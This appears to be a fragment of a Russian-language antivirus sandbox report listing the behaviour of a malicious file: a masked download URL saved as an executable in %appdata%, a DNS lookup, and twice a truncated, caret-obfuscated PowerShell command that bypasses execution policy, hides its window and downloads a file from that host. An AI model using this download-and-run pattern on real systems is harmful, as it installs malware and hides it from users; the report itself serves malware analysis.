Техническая информация
- http://lt##.#omaklide.pl/file/bev.hjn как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwE^rSHE^lL.^eX^e^ -E^X^Ec^Ut^IO^npo^L^i^c^y^ bypaSS -^No^prO^Fi^le -wi^n^dOw^sTYlE^ HIDd^eN (NE^w-OBJec^t SYs^te^M.n^ET.^wE^B^CL^ieN^T).DO^WnlOADFi^L^e(^'http://lt##.#omak...
- DNS ASK lt##.#omaklide.pl
- '<SYSTEM32>\cmd.exe' /c "pOwE^rSHE^lL.^eX^e^ -E^X^Ec^Ut^IO^npo^L^i^c^y^ bypaSS -^No^prO^Fi^le -wi^n^dOw^sTYlE^ HIDd^eN (NE^w-OBJec^t SYs^te^M.n^ET.^wE^B^CL^ieN^T).DO^WnlOADFi^L^e(^'http://lt##.#omak...' (со скрытым окном)